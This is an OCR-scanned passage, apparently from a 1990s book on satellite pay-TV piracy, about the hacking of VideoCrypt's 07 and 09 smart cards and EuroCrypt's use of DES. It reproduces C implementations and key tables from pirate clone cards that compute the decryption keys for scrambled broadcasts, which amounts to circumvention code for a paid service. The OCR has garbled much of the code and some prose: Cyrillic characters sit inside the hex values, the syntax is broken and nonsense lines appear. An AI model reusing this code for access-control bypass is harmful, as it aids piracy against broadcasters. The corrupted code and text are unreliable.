of the eight output registers, r[0..7]. The contents of acc are then EXORed 
with the contents of the register r[Ppos]. 


The core function is relatively straightforward and could be implemented in 
a language other than C. The main problem is the definition of the byte wide 
registers. While this would not be a large problem in some of the more 
structured languages, it can cause problems in QBasic. 
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The Ho Lee Fook Algorithm - Single Stage 









Initial Output Register 


Pointer To Key Byte In Array i 


256 Element Key Array 


Core Routine 


Next Output Register 


Byte From Message Block 


In each case the width of each register is a single byte. The 
complete message block is 32 bytes wide and the complete output 


block is eight bytes wide. 


The algorithm when viewed like this is surprisingly linear. The main 
thing to consider is that the function of adding or multiplying by two is 
lossy. Therefore to reverse one of these functions leaves two possible 


answers. 
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3: The 07 HLF Algorithm In Operation 


The strength of the HLF algorithm lies in the fact that the core function is 
applied ninety nine times. The thirty two byte message block is transformed 
into the eight byte output block. The application sequence is shown below. 


Input Byte 

msg[0...26] Processed Through Function Once 

0 Processed Through Function Twice 
msg[27..29] Processed Through Function Twice 
msg[31] Processed Through Function 64 Times 


The thirty second byte, Byte 31, is intended to make it exceedingly difficult 
to reverse the algorithm. This byte is often referred to as the “destructor 
byte”. The thirty first byte, Byte 30, is not processed through the core 
function. This byte along with bytes 27,28,29, is used to provide the 
checksum for the packet. 


In the manner that the algorithm transforms the thirty two byte message 
block to the eight byte output block, it is more akin to a message digest. 
Instead of a single decryption key being extracted from the datastream, as 
is the case with VideoCipher and EuroCrypt, the whole packet effectively 
becomes the encrypted key. 


If any of the bytes are wrong then the resultant output block will be wrong. In 
this respect it is very elegant. The integrity of the authorisation data, channel 
identification and decryption information is guaranteed. The official card will 
reject any packet that fails the checksum. This means that the card cannot 
be authorised by hackers who do not know what the card identity and 
checksumming routines are. 


Of course if a hacker knew the checksumming procedure, turn-on com- 
mand and had a valid algorithm with key table, the system is wide open. 
This is exactly what happened with the Phoenix and Genesis programs. 


From the knowledge gleaned from the previous sections, it is now possible 
to draw a rather simplified model of the HLF algorithm in operation. The 
model shown is effectively cyclic. 


The distribution of the bytes from the message block among the output 
registers is linear as far as byte 26. For the checksum, routine the pattern 
changes but after this routine, the pattern resumes the cyclic structure. 
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A Simplified Model Of the HLF Algorithm 


Output Registers — Owf Function 
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The + in each case represents Modulo 2 addition or EXORing. The 


text r,+m indicates that the message byte is EXORed with the contents 
of the register. Some of the EXOR stages such as the EXORing of the 
message byte, m, with the relevant output register, r, 
EXORing of the output of the function f(kj+m)m) with the relevant 
Output register, r, are omitted for clarity. To see how the individual 


stages are constructed refer to the diagram on page 6-40. 
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Distribution Of Message Block Bytes 


Output Message Byte 

00 08 16 24 -- 31 31 31 31 31 31 31 31 

01 09 17 25 28 31 31 31 31 31 31 31 31 

02 10 18 26 28 31 31 31 31 31 31 31 31 

03 11 19 *0 -- 31 31 31 31 31 31 31 31 

04 12 20 *0 29 31 31 31 31 31 31 31 31 

05 13 21 -- 29 31 31 31 31 31 31 31 31 

06 14 22 27 -- 31 31 31 31 31 31 31 31 

07 15 23 27 31 31 31 31 31 31 31 31 31 

“0 is where the value 0 is used instead of a byte from the message block. 
This happens for the first two rounds of the checksum routine. Where the 
symbol -- appears, the register is skipped. Also if you count the number of 


times that byte 31 is applied to each register, you will see that it is applied 
eight times to each register. 


NOU > шу кюю ҥнҥ © 


This pattern also repeats, though offset by one register, in the application of 
the output of the core function. The difference here is that the processing of 
the “0 bytes does produce different results. 


Distribution Of Core Function Output Bytes 


Output Round 

-- 07 15 23 30 35 42 51 59 67 75 83 91 

00 08 16 24 -- 36 44 52 60 68 76 84 92 

01 09 17 25 31 37 45 53 61 69 77 85 93 

02 10 1826 32 38 46 54 62 70 78 86 94 

03 11 19 27 -- 39 47 55 63 71 79 87 95 

04 12 20 28 33 40 48 56 64 72 80 88 96 

05 13 21 -- 34 41 49 57 65 73 81 89 97 

06 14 22 29 -- 42 50 58 66 74 82 90 98 

The basic model shows that in each round there are changes to two of the 
output registers. The register at the start of the round has the message byte 
EXORed with it. This now becomes the key pointer for the core function. 
The output of the core function is then EXORed with the contents of the next 
output register. 


The program shown below is the implementation of the 07 HLF algorithm 
without the major checks for ECMs. Changing the message block is simply 
a matter of overwriting the current values and recompiling. It was written 
and compiled with Turbo C++. 


"uoc Ь чш мо ҥн © 
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#include <stdio.h> 
/* This a model of the Ho Lee Fook Algorithm 
as used in the hack on VideoCrypt. */ 
unsigned char key[56] = { 
0x65, Oxe7, 0x71, Ох1а, Oxb4, 0x88, Oxd7, 0x76, 
0x28, Охао, 0х4с, Ox6e, 0x86, Ox8c, Oxc8, 0x43, 
Оха9, Oxec, 0x60, 0x42, 0x05, Oxf2, Ox3d, 0х1с, 
Ox6c, Oxbc, Oxaf, Oxc3, Ox2b, Oxb5, Oxdc, 0x90, 
Oxf9, 0x05, Oxea, 0x51, 0x46, Ox9d, Oxe2, 0x60, 
Ox70, 0x52, 0x67, 0x26, 0x61, 0x49, 0x42, Ox09, 
0x50, 0x99, 0x90, 0xa2, 0x36, 0х0е, Oxfd, 0x39 
ү 
unsigned char r[8]; /* This is the key output */ 
unsigned char msg[32]- ( 
Oxf8,0x3f,0x6a,0x29,0x51,0x19,0x01,0x8a, 
0xa7,0xbc,0x50,0xeb,Oxec,Oxed,Oxee,Oxef, 
Oxf0,0xf1,0xf2, 0xf3,Oxf4,Oxf5, Oxf6, Oxf7 , 
Oxf8,0xf9,0xfa,0x8c,0x7a,0x20, Oxff,Ox4 1 
} 
/* This is the messagepacket */ 
int Ppos=0, Offset=0; 
/* Core Function */ 
void Owf(unsigned char byte) 
{ 
unsigned char acc,kpoint,k1,k2; 
r[Ppos]^-byte; 
kpoint=r[Ppos]; 
k1=key[Offset+(kpoint>4)]; 
k2=key[Offset+16+(kpoint&0x0f)]; 
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acc=k1 + К2; 
acc=~acc; 
acc = (acc«1) | (acc>7); 
acc+=byte; 
acc = (acc«1) | (асс>7); 
acc = (асс>4) | (acc«4); 
Рроѕ++; 
Ppos&=7; 
r[Ppos]^-acc; 
) 
void main (void) 
{ 
unsigned char a,b=0; 
for(a=0;a<8;a++) r[a]-0; /* initialise key */ 
if(msg[1]<0x33) /* Calculate Offset */ 
Offset=0x00; 
else if(msg[1]«0x3b) 
Offset=0x08; 
else 
Offset=0x18; 


printf( ` Offset (in hex) =”); 
printf(  96X *’ Offset) 
printf( n"); 
#ог(а=0;а<27;а++) 
Owf(msg[a]): 
/* Checksumming Routine */ 
printf( Ха * Checksumming Routine * \n `“; 
printf(" Conditions: valid checksum па]  msg[Ppos] M"); 
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printf( "If this routine is omitted then the algorithm \п”); 
printf( will decrypt any msg packet without actually 1а”); 
printf( " checking to see if it is valid. \п X"); 
for(a=27;a<31;a++) 
{ 
Owf(b); 
Owf(b); 
b-msg[a]; 
printf( 96X `, msg[a]); 
printf( `° %X `', r[Ppos]); 
if(msg[a]!=r[Ppos]) 
{putchar(7); printf( "Invalid Checksum Result \п”);} 
else printf( "Valid Checksum Result \n”) 
Рроѕ++; Ppos&=0x07; 
} 
for(a=0;a<64;at++) Owf(msg[31]); /* Apply Destructor Byte */ 
printf(" \n Message Block: M"); 
for (а=0;а<16;а++) 
printf( ^ 96X ”,тва(а)); 
printf( Xn"); 
for (а=16;а<32;а++) 
printf( "96X ”,тва(а)); 
printf( n"); printf("); 
printf( `The decrypt key is: n"); 
for(a=0;a<8;a++) printf( 96x `, Па); 
) 
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Dark Wednesday And Beyond 


It was getting a bit like that scene in Monty Python's “Holy Grail”. You know, 
the one where the knight claims he is able to fight even after multiple limb 
amputations and decapitation. For at least a year, the VideoCrypt system 
had been totally and utterly hacked and Sky and News Datacom had tried 
everything short of a new card issue to stop the hack. 


On May 18th, 1994 the 09 card went into operation and the hacker cards 
stopped. In the annals of satellite piracy, the day is known as Dark 
Wednesday. All over Europe there was panic though some were handling it 
better than others. Some card dealers had disappeared fearing the worst 
from their customers. 


At first, there were hopes that it was just another countermeasure. The 
packet structure seemed much the same. The main difference was that 
message byte 1, the card age byte, now pointed to a table outside the 
regular three tables. It was the 09 card. 


When the original Ho Lee Fook hack occurred, the resources committed 
were not even a tenth as strong as those arrayed against the 09 card. The 
OMIGOD hack opened up the structure of the VideoCrypt system to mass 
analysis. This hack was used as the starting point for the hack on the 09. 


Initially it was a case of doom and gloom all around. The pirates and 
hackers were frustrated by the new card. But there were other things going 
on that most people, News Datacom and Sky included, did not even know 
about. 


On June 20th, roughly a month after the transition to 09, there was an 
auction of 09 code. This gave the pirates and hackers new hope - until it 
was ECMed a week or so later. But it did lay the foundations for the 
complete hacking of the 09 card. 


The complete, or at least stable, hack of the 09 card did not occur until late 
October 1994. The time between the transition and the hack was 
approximately five months. This now seems to be a pattern with Sky card 
issues. 


When VideoCrypt was launched, it was supposed to be the ultimate 
scrambling system. To date it has been the ultimate in one thing only - 
disasters. From the Infinite Lives hack to the Kentucky Fried Chip to the Ho 
Lee Fook 10, the system has been repeatedly hacked. The hackers now 
know more about the system than most of the channels that use it. Every 
one of the microcontrollers in the VideoCrypt decoders has been popped. 
Their programs have been dumped and analysed. 
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Perhaps the main problem is that the security overlay was not developed in 
an electronically hostile environment. This was evident from the papers 
presented in the Irish High Court. The software development of the access 
control and subscription management appeared to have been carried out in 
the USA and Israel. The people who developed it appeared to be very good 
academics and fell into that old trap. They were, like many designers, 
blinded by their own brilliance. However commercial piracy does not respect 
such niceties and there was just too much money at stake to leave the 
cards unhacked. 


As a system, VideoCrypt is actually good. It does have possibilities but the 
fact that it was designed in the eighties weighs heavily against it. The 
Frozen Architecture was the ruling format for scrambling systems but the 
smart card was adding some flexibility. The security of the system now only 
depends on the smart card. If the smart card can be reverse engineered, 
there is little that can be done to maintain the system's integrity. Admittedly, 
the channel can implement ECMs on a regular basis but that is, in the 
present environment, counterproductive. The implementation of repeated 
ECMs with the 07 and 09 Sky cards forced the hackers to innovate. The 
result was the battery card where the card user could punch in the fix for the 
ECM on a keypad on the card or via the television’s remote control. 


VideoCrypt would have been a lot more successful as a sporadically 
deployed system. It does not appear to have been designed as a generic 
scrambling system, or indeed to handle the present volume of subscribers. 
Blacklisting in a system should be extremely fast. The problem is that it has 
become the de-facto scrambling system for English language channels. 
This has given News Datacom and Sky a monopolistic stranglehold on the 
English language satellite television market. 


It seems that at this point in time the only things the future holds for 
VideoCrypt are hacks and a slow extinction as the digital systems come 
on-line. The response of News Datacom and Sky to these hacks will 
probably be the same - they will waste money on legal action while trying to 
develop a more secure smart card aspect. Meanwhile the ECM-ECCM 
battles will continue. 


As in times past, the warm waters of the Caribbean beckoned the European 
pirates. The prey this time was the DirecTv system. News Datacom are 
supplied the security overlay for this system. The security overlay, known as 
VideoGuard, is the digital version of the VideoCrypt system. However it is 
more flexible and more advanced. The hack on this system was carried out 
by North American hackers. 
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The same claims were being made about the DirecTv system as were 
made about VideoCrypt. All the same old waffle about how great the people 
who designed the algorithms are, how the card can be replaced if there is a 
hack, the wonderful adoring publicity pieces in the trade publications. 
Strangely none of the DirecTv publicity mentions anything about the hacking 
of VideoCrypt and the effect of fiscal reality on the “Detachable Secure 
Microcontroller” theory. 


DirecTv's system was hacked and battery cards are being openly marketed 
in magazines and on the internet. They have a major problem - they 
believed the hype. Of course the problem has not reached the magnitude of 
the Sky situation. The current estimate of pirate cards is that there are 
under 200,000 pirate cards in the market. 


The latest information indicates that there is a Phoenix hack that is now 
being used on the DirecTv system. This is perhaps the most dangerous 
form of hack as it is aimed directly at the official smart card. It can activate 
all channels and give the card PPV facilities. 


Unlike the BSkyB and VideoCrypt, the PPV element on the DirecTv system 
forms a major part of programming. On BSkyB, PPV is a sporadic event 
perhaps once or twice a year. A Phoenix hack on the PPV element of 
DirecTv therefore has a far greater effect in terms of financial loss to the 
channels. 


DirecTv will switch cards probably in October but until that time, the system 
is compromised. However what will happen after that is more important. 
The word is that the hackers are ready and waiting. There are of course 
some rather typical displays of bravado with claims that the new card can 
easily be hacked. There is no such thing as an easy hack on a smart card. 


If News Datacom follows the pattern of the initial DirecTv card, then they will 
base the new DirecTv on the Sky 10 card. Given that piracy in Europe will 
be illegal throughout the European Community in the next year or so, 
European hackers have already made plans. Of course so too have News 
Datacom and DirecTv. 
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The 09 Algorithm 18:05:94 - 27:06:94 


On 20/06/1994, there was a very strange event. There was an auction in the 
Dorchester hotel in London. It was the item on offer that staggered belief. 
The item was a full working copy of the 09 Sky code. Faxes were 
transmitted to all interested parties. There was even a number of pages of 
commented machine code to illustrate the provenance of the software. 


Needless to say this did not last very long as Sky struck back with another 
electronic countermeasure. The best analogy for this ECM is a scorpion. It 
had a very nasty sting in the tail. 


The auctioned code only lasted for a week before Sky and News Datacom 
implemented their electronic countermeasure. The effect of this ECM was 
total. 


The code released on 20/06/1994 was incomplete. However many of the 
ideas used in the 07 code were carried over into the 09 release. The original 
design concepts are there, but they had been modified. The intent of these 
modifications appears to have been to make the algorithm more secure. It 
did. 

Much of the ideas that were in the 07 algorithm can be found in the 09 
algorithm. However the 09 algorithm is far mores secure and is also more 
difficult to reverse. 


One of the essential elements of the 09 algorithm is that it uses 
multiplication in the core function. This is perhaps a direct attack on the 
РІС16С84 microcontroller that formed the heart of the 07 pirate smart card 
industry. The PIC16C84 microcontroller does not have a multiply instruction. 


The 09 Key Tables And Key Selection: 


The size of the initial key table in the 09 code is 216 bytes as opposed to a 
typical 56 bytes in the 07 code. The concept of code table reuse is present 
in the 09. 


The segment of the code table to be used for key generation in each round 
is selected using an offset derived from the message packet. There are 
three known selections. Two of the selections allow the use of a single 64 
byte array in the key generation. The other selection uses the EXOR sum of 
two 64 byte arrays. 


In the 07 code the key bytes were used in pairs. There were two 16 byte key 
arrays. The arrays have been increased to 64 bytes each in the 09 code. 
Though most of the options in the version released use a single 64 byte 
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array, there is a provision for a combination of two arrays. This dual array 
option was used up to 26:06:94. 


The key combination function, addition in the 07 code, has been changed to 
EXOR in the version of the 09 code under examination. Though the reason 
for the change is not known, it could have been intended to frustrate 
attempts to read out the key bytes. 


The 09 Core Function 


This is perhaps the greatest change in the overall structure of the algorithm. 
Whereas the 07 code only operated on a pair of the output registers during 
any round, the 09 code operates on all eight of the output registers. 


The fact that the contents of all of the eight change after each round means 
that the simplified attacks on the bytes before the checksum bytes in 
version 07 will not work with this algorithm. 


The structure of the 09 core function is effectively four routines. The first 
three are identical and operate on r[2 to 7]. The final routine, while being 
similar to the preceding routine introduces a number of constants. This 
routine operates on г[0] and r[1]. 


The first three stages use different keys. The pointer to the key byte is 
derived by ANDing the starting output register with 3Fh. This ensures that 
there are only 64 possible values for the pointer. This pointer value has an 
offset added to select the correct byte. This offset can be set using a byte in 
the message packet. In the version that Sky nuked, the following selection 
was used: 


k1= r[i] & Ox3F; 

k= key[k1] ^ key[k1 + Ox98]; 

The process used in both routines is multiplication. The result of the 
multiplication is a sixteen bit number. This result is broken into two bytes 


which are then combined with the contents the two output registers affected 
by the stage. 


In the first routine, the multiplication operates on the combination of the 
message byte, the key byte and three of the output registers. The message 
byte is modified for stages two and three. 


The second routine multiplies the contents of output registers r[6] and г[7]. 
The high and low byte are distributed over r[1] and r[0]. The contents of 
these registers then have a constant added and also can be incremented by 
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Model Of 09 Core 
Function 












Routine 1 (Stage 1) 


тіп)” 


Тһе 09 core function depends оп 
two routines. The first is used three 
times and the last is only used once. 


The key byte, k,, is only applied in 
the first im uds The message 
byte, m[n], applied in the first stage. It is 
then multiplied by two and has a 
constant added to the result. This new 
value, m[n], is used іп Stage 2. The process is 
repeated to give m[n]". This value is used in Stage 
3. 


Stage 4 uses a different routine to the previous stages. This 
particular routine is simlar to the previous one but it does introduce a 
number of constants. The key byte and message bytes are not used in 
this stage. 


In each stage, the contents of only two registers are changed. In the 
diagram these are the boxed r, registers. The rounded boxes are 
registers used in each round but the contents of which do not actually 
change. 
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one depending on whether the result meets the condition of an IF 
statement. 


The Structure Of The Code 


The surprising thing about the Dorchester 09 code is that uses the same 27 
-4 - 1 structure as the 07 code. The first 27 bytes are processed once each, 
the next four bytes are used to provide the checksum for the packet and the 
last byte is processed sixty four times. 


The checksum routine was largely the same as that for the 07 except that it 
now checked the contents of output register r[7] against the message byte. 


Apparently up to issue 09, the subscription management software was 
dependent on this structure of the message packet So only minor 
modifications to the sequencing could be made for the 09 card. 


After The ECM 


The ECM on 27/06/1994 effectively knocked out the Dorchester code basic 
algorithm. What had been in use up to this point had been the transitional 
version of the algorithm. The pirates who had purchased the code at the 
Dorchester auction had not purchased the whole code. That was on sale for 
£300,000 but nobody had apparently bought it. What followed was a long 
hot summer of very hard work. 


The pressure on hackers to either crack the code and to reverse-engineer 
the 09 card was immense. It was going to be late October before there was 
a stable pirate 09 card. It was a combination of the Dorchester code and 
code reverse engineered from the 09 smart card. 


The ECM was, in essence, simple. What had changed was the algorithm 
itself. News Datacom had integrated subcommands (nanocommands - see 
Chapter 7) into the 74h packet. These nanocommands allowed the hash 
function to be executed with different input data or a different number of 
times. In fact some of these nanocommands were downright devious in that 
they allowed the card memory to be reprogrammed. 


The use of nanocommands left hackers paralysed in trances of crypto- 
graphic theory. The hackers working for the pirates were measuring the 
execution times of the functions in the card, counting clock cycles and were 
also checking current drawn. Pirates were left without cards to sell and Sky 
were happy again. Once again their system was secure - but not for long. 
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This is the Core Function of the 09 Dorchester Code. It is more complex 
than the 07 Core Function in that it changes the contents of all of the 
answer registers in each round. (key selection simplified) 


/* The 09 Core Function */ 
void Owf09(const unsigned char in, unsigned char *r) { 
unsigned char a, b, c, d, key; unsigned short acc; 
inti; а= іп; 
/* Routine 1 - affects r[2], г[3], г[4], [5], г(6], [7] */ 
for (1 =0; 1 <=4; i+=2) ( b» г[1] &Ox3f; 
/*simplified key selection */ 
key = key09[b] ^ keyO9[b + 0x98] ; 
С=а + key - г[1+1]; 
а = Сг[1] - r[i+1]) ^a; 
асс= 4 * с; 
/* EXOR low byte of result with r[i+2] */ 
r[i +2] A= (асс & Oxf Ff); 
/* Add high byte of result to r[i+3] */ 
r[i +3] +=acc>8; 
acc = (а < 1) | (а> 7); 
acc += 0x49; 
} 
/* Routine 2 - affects r[0], r[1] /* 
acc = r[6] * r[7]; 
/* Add low byte of result to r[0] */ 
а = (acc & Oxff) + г[0]; 
if (а < г[0]) a++; 
г[0] = a + 0x39; 
/* Add high byte of result to r[1] */ 
а = (асс > 8) «r[1]; 
if (а < г[1]) a++; 
r[1] = а + 0x8f; 
return; 


} 
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The Dorchester Code Transcoded From PIC to C 


This code is reproduced here courtesy of Markus Kuhn. 


/* 

* This is the algorithm and key as used in a PIC16C84 

* BSkyB clone card. It worked fine between 1994-05-18 

* and 1994-06-27. It still produces the correct signature, 
* but not the correct hash result after 1994-06-28. 

ж 

% МК, 1994-06-30 

27 


const unsigned char key09[216] = { 

0x91, 0x61, Ox9d, 0x53, Oxb3, 0x27, Oxd5, Oxd9, 
Ox0f, 0x59, Oxa6, 0х6Ғ, 0x73, Oxfb, 0x99, Ox4c, 
Oxfb, 0x45, 0x54, 0х8е, 0x20, 0х5Ғ, Oxb3, Oxb1, 
0x38, 0х40, Ox6b, Оха7, 0x40, 0x39, Oxed, 0х2а, 
Oxda, 0x43, Ox8d, 0x51, 0x92, Oxd6, Oxe3, 0x61, 
0x65, Ox8c, 0x71, Oxe6, 0x84, 0x65, 0x87, 0x03, 
0x55, Oxbc, 0x64, 0x07, Oxbb, 0x79, Ox9e, 0x40, 
0x97, 0x89, Oxc4, 0x14, 0х8Ғ, Ox8b, 0x41, Ox4d, 
0х2а, Oxaa, Oxe8, 0хе1, 0x08, Oxcd, 0x82, 0x43, 
0х8Ғ, 0х6Ғ, 0x36, Ox9b, 0x72, 0x47, Oxf2, Oxa4, 
0x49, Oxdd, Ox8b, Ox6e, 0x26, Oxc6, Oxbf, Oxb7, 
Oxd8, 0x44, Охс3, 0x70, 0xa3, 0х4с, Oxb6, Oxb2, 
0x37, 0x9b, 0x09, Oxdf, 0x32, 0x28, 0x24, 0x86, 
Ox8d, 0х5Ғ, Oxe6, Ox4b, Ox5d, OxdO, Ox2f, Oxdb, 
Охас, Ox2e, 0x78, Oxle, Oxcc, 0x52, Oxc1, 0x61, 
Oxea, 0x82, Охса, Oxb3, Oxf4, 0х8Ғ, 0x63, 0х8е, 
Ox6c, Oxbc, Oxaf, Oxc3, Ox2b, Oxb5, Oxdc, 0x90, 
Oxf9, 0x05, Oxea, 0x51, 0x46, Ox9d, Oxe2, 0x60, 
0x01, 0x35, 0x59, 0x79, 0x00, 0x00, 0x55, OxOf, 
0x00, 0x00, 0x00, 0x00, 0x10, Охбе, Ox1c, Oxbd, 
Oxfe, 0x44, Oxeb, 0x79, Oxf3, Oxab, Ox5d, 0x23, 
Oxb3, 0x20, Oxd2, Oxe7, Oxfc, 0x00, 0x03, Ox6f, 
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Oxd8, Oxb7, Oxf7, Oxf3, 0x55, 0x72, 0x47, 0x13, 
Ox7b, OxOc, 0x08, 0x01, Ox8a, Ox2c, 0x70, 0x56, 
0x0a, 0x85, 0x18, 0x14, 0x43, Oxc9, 0x46, 0x64, 
0х6с, 0x9a, 0x99, 0x59, 0xOa, Ox6c, 0x40, Oxd5, 
0x17, Oxb3, Ox2c, 0x69, 0x41, Oxe8, Oxe7, OxOe 
}; 


уақы ды а ғылы ыды ыы ы д ыы ан ы ааа қыра ы 


Oniy 64 bytes of this table were used. This allowed some 
implementations to reduce the key selection routine and the key 
storage- This resulted in a significant memory saving in the 
PIC16C84 implementations. 


жк кк ыы 7 


void kernel_b(const unsigned char in, unsigned char *answ, 
const unsigned char sel) 
{ 
unsigned char a, b, c, d; 
unsigned short m; 
inti; 
а-іп; 
/* Routine 1 */ 
for (1 =0; і<-4; 1 += 2) { 
b = answ[i] & 0x3f; 
if (sel <=8) { 
if (sel == 2) b = key09[b + 0x40]; 


else{ 
if (sel < 2 && b == 0) b = key09[b + 0x8d]; 
else 
b = key09[b] ^ keyO9[b + 0x98] ; 
} 
) else 


b = key09[b] ^ key09[b + 0x98]; /* only this опе is used */ 
c=a+b - апѕм[1+1]; 
а = (answ[i] - answ[i+1]) Aa; 
m=d*c; 
answ[i + 2] A= (m& Oxf Ff); 
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answ[i + 3] +=m> 8; 
a-(a«1) | (a»7); 
а += 0x49; 


/* Routine 2 */ 
m = answ[6] * answ[7] ; 
а = (m&Oxff) + answ[0] ; 
if (а < answ[0]) a++; 
answ[0] = a + 0x39; 
а= (т> 8) + апѕм[1]; 
if (а < answ[1]) а++; 
answ[1] = а + Ox8f; 
return; 


int decode_b(const unsigned char *msg, unsigned char *answ) 
{ 

inti, 3; 

int check = 0; 

unsigned char b = 0; 
for (120; 1 <8; i++) answ[i] = 0; /* Clear answer regs */ 


for (120; 1 < 27; i++) /* Do Kernel */ 
kernel_b(msg[i], answ, msg[1]); 


/* Hash Checksum */ 

for (1 = 27; i < 31; i++) { 
kernel_b(b, answ, msg[1]); 
kernel_b(b, answ, msg[1]); 


b = msg[i]; 
if (b != answ[7]) check |=1; 
} 


/* Process Last Byte */ 
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уды ыы ыы ыы ыы ыы ыы ыы ӨӨӨ ҮҮӨ 


This is the point at which the processing changed after the ECM of 

27-06-94. Depending on a card command sent in the 74h, the card 

would execute a series of nanocommands which handled the 

processi ng differently. The packet would of course have a valid 
ash checksum and would look just like any other packet. 


e e e Ae He к IO e e He e TTI TIT К He de Ae He TOA TA He e IA e He e He e e К e He (7 


for (i =0; 1 < 64; i++) 
kernel. b(msg[31], answ, тѕ9[1]); 
answ[7] &- 0х0Ғ; 


/* test checksum */ 
b-0; 
for (i20; i < 32; i++) 
b+=msg[i]; 
if (b != 0) check |=2; 
return check; 


The code in use after the ECM was a lot more complex. The Dorchester 
code was certainly the transitional format of the code and the pirates who 
bought it seemed to be guided more by money than experience. 


The ECM was based on Nanocommands. These packets carried sub- 
instructions that used bytes from the address space of the card as inputs to 
the hash function. Other variations allowed the hash function to be executed 
more than 64 times on the last byte. This in itself pushed the PIC16C84 
almost to the limit as the card was relying on the multiplication instruction, 
an instruction that the РІС16С84 did not have. 


It is believed that the DSS code uses a similar nanocommand approach. 
Тһе nanocommands were to prove to be a major asset in the battle against 
the 09 card hackers and pirates. The allowed the implementation of more 
complex ECMs that would not have been possible on previous card issues. 
They also offered News Datacom the potential to implement what would 
cryptographically be a different algorithm every few minutes. This was 
probably a direct reply to the cryptographical weaknesses of the 07 
algorithm. 
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EuroCrypt - Catastrophe By Committee 


At the 1992 Subscription Television Conference in London, | called the 
EuroCrypt-M D2-MAC system “crap”. | actually used that word because it 
looked like some very stupid mistakes had been made in its implementa- 
tion. The system was utterly vulnerable to the McCormac Hack and 
according to all indications, the system was about to be seriously compro- 
mised. 


It was a hot Friday afternoon in the middle of the wet English Summer. The 
conference was one of those overpriced self-congratulatory events that pad 
the corporate calendar. Most of the audience were asleep or braindead. It 
was hard to tell from the stage. Even the ensuing debate between Jean 
Pierre Coustel, the head of the France Telecom Visiopasse program, and 
myself failed to wake some audience members. 


Later that year, EuroCrypt-M was hacked. The results have been disastrous 
both for France Telecom and the channels using EuroCrypt-M. At the time 
of writing most of the channels using the system are still hacked. France 
Telecom were spurred into legal action in Germany against Megasat, one of 
the main producers of hacker D2-MAC EuroCrypt-M cards. 


This court action in Germany makes Sky and News Datacom look 
downright clever by comparison. Unfortunately the judge appeared to be 
classically educated and swallowed the France Telecom story about a 
secret key in the card being a trade secret. He allowed a temporary 
injunction against Megasat which stopped them selling hacker EuroCrypt 
cards. 


France Telecom and Canal Plus also took action against Benedex on the 
basis that they were responsible for most of the D2-MAC piracy. The action 
effectively put Benedex out of action. The piracy on D2-MAC continued 
proving that France Telecom and Canal Plus were about four years to late 
to stop piracy on EuroCrypt. 


With Benedex out of the way, FilmNet and TV1000 implemented key 
changes. The update has been referred to by some hackers as the “Natural 
Born Idiots” upgrade. The movie “Natural Born Killers” was to be shown on 
FilmNet and TV1000. The upgrade, according to theory would prevent the 
pirate viewers from seeing the movie. Of course the new keys were 
released within a few hours. It made FilmNet and TV1000 look like idiots 
hence the name of the upgrade. 


The only thing that the Natural Born Idiots upgrade succeeded in doing was 
swelling the coffers of the pirates. It seemed like TV1000 was trying to exact 
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some revenge after all the years that it has been hacked. It is moving to a 
new satellite as of August first. In the end they couldn’t even do things 
properly. And FilmNet? Well, they just went along for the ride. 


The Algorithm 


In EuroCrypt, the critical element is the key rather than the algorithm. The 
algorithm is that old favourite, the Date Encryption Standard algorithm. It 
has of course been modified to run faster in the software implementation in 
which it is used. The initial and inverse initial permutations are removed for 
the EuroCrypt-M implementation. 


A comment made at the 1992 Subscription Television Conference that 
EuroCrypt used the same algorithms as the banks gave the game away. 
From then on it was a simple case of narrowing down the options. The 
banks use RSA and DES. 


Of the two algorithms, DES was the more likely. The EuroCrypt-M smart 
card does not have the computing power to safely handle RSA as part of the 
control word generation. Therefore the algorithm used had to be DES or a 
variant. 


The problem with DES is that it is heavily geared towards a hardware 
implementation. It can be difficult to implement in software even in a 
microcontroller. The EuroCrypt smart card is modeled on the 6805 
microcontroller and runs at 3.5 MHz. Any modifications to the published 
algorithms would have the desired aim of speeding up the decryption 
process without weakening the security. 


The most obvious modification was the elimination of the Initial and inverse 
Initial Permutations, (IP and -IP). A public domain computer program, 
NET_DES.ARC, pointed out that these permutations appeared to slow 
down the process when it was implemented in software. It allowed an 
implementation in software without these permutations. Even with these 
permutations removed from the implementation, the DES is still a good 
algorithm for use in a scrambling system. The only proviso is that the key 
handling protocol must be good. 


There has been a lot of debate over why France Telecom chose the DES 
algorithm. Some see it as an example of bureaucratic bumbling. Others see 
it as a quick solution that saved them some hard cryptographical research. 
More still consider that it was a good choice considering that it was one of 
the better public domain algorithms at the time. The real answer is only 
known unto France Telecom. Of course the current speculation is that it 
was a combination of all three. 
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The implementation of DES in the EuroCrypt-M is the Electronic Code Book 
mode with the initial and inverse initial permutations removed to make it run 
faster. The seed transmitted over the air is ENCRYPTED using the 
algorithm to produce the result. 


The implementation of DES in the EuroCrypt-S2 is also the Electronic Code 
Book mode. In this case, the seed is DECRYPTED using the algorithm. The 
initial and inverse initial permutations are also used. 


A EuroCrypt Phoenix? 


The one thing that has saved the D2-MAC EuroCrypt-M system from a 
widespread Phoenix type attack is the fact that it is easier to implement the 
critical algorithm. However Phoenix programs for testing the EuroCrypt 
cards have been developed. These programs have not been distributed 
because there is no real need for them. The other aspect is that the key 
handling procedures in EuroCrypt are different to those used in VideoCrypt. 


In the EuroCrypt specification, the critical elements are the keys. The theory 
is that the algorithm is too difficult to reverse. A couple of years ago this 
would have been true but the algorithm can be reversed using DES cracking 
engines. However such engines are far outside the budget of most 
EuroCrypt pirates and hackers. 


Had the key handling theories of the designers of EuroCrypt been 
implemented, then the EuroCrypt system would definitely have been a 
harder system to hack than it was. However the fact that the majority of 
cards in operation on the channels using EuroCrypt are EPROM meant that 
frequent key updates were not feasible. 


The best example of EuroCrypt being used according to specification is 
Cine Cinemas. The keys are updated regularly. However the problem is that 
the relevant management key is known by the hackers and pirates. Now if 
the management key that is used to encrypt the key updates is not known, 
any hack would have a very limited lifetime indeed. Of course central to all 
this is the checksumming routine used on the system. 


While key updates on FilmNet, TV1000 and the TV3s have been sporadic, 
other channels seem to be taking a more active approach. It is believed that 
the Rendezvous channel, a hardcore French porn channel, changes their 
key every few days. Rumblings of a new key change policy have been 
detected in some of the Scandinavian channels as well. 


A new key update schedule seems to be a possibility for FilmNet and 
TV1000. The theory is that they will revert to a monthly key schedule. The 
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new keys will be downloaded during the last week of one month and the first 
week of the next. This kind of key update schedule is similar to that used on 
the VideoCipher II system in the USA during the mid eighties. It is of course 
a more radical approach than FilmNet or TV1000 have used before. There 
is one flaw in the approach. If the management keys used to update the 
keys are known then the hackers and pirates can also update their cards. A 
two week or even a one week key update period is not sufficient to cause 
problems for commercial pirates. The battery cards are especially immune 
to this relatively long update period. It remains to be seen if this will actually 
